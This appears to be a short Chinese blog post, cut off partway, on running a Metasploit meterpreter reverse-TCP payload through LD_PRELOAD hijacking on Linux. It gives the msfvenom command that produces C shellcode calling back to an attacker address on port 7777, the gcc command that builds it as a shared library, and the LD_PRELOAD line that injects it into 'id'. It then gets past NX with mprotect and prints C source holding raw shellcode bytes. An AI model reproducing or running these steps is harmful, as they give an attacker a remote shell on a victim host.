Learning

    先用msfvenom生成c 语言payload：msfvenom  -p linux/x64/meterpreter/reverse_tcp  lhost=x.x.x.x  lport=7777 -f c  >  test.c     补充完test.c后如下：       编译：gcc -fPIC -shared -o test.so test.c     LD_PRELOAD劫持：LD_PRELOAD=./test.so  id     执行时报错：     Segmentation fault     推测应该是栈不可执行的原因，gcc编译的时候默认开启了NX选项，即数据所在内存页不可执行，可以在编译的加上 -z execstack 禁用NX保护，但是在这里行不通，因为是要劫持的程序（比如id）开启了NX，所以需要在程序里使栈可执行。在stackoverflow搜到一种 方法 ，即利用mprotect函数使内存页可执行，该函数原型为int mprotect(void *addr, size_t len, int prot)。     修改后的程序如下：     #include #include #include #include #define PAGE_START(P) ((uintptr_t)(P) & ~(pagesize-1)) #define PAGE_END(P) (((uintptr_t)(P) + pagesize - 1) & ~(pagesize-1)) unsigned char shellcode[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a" "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\...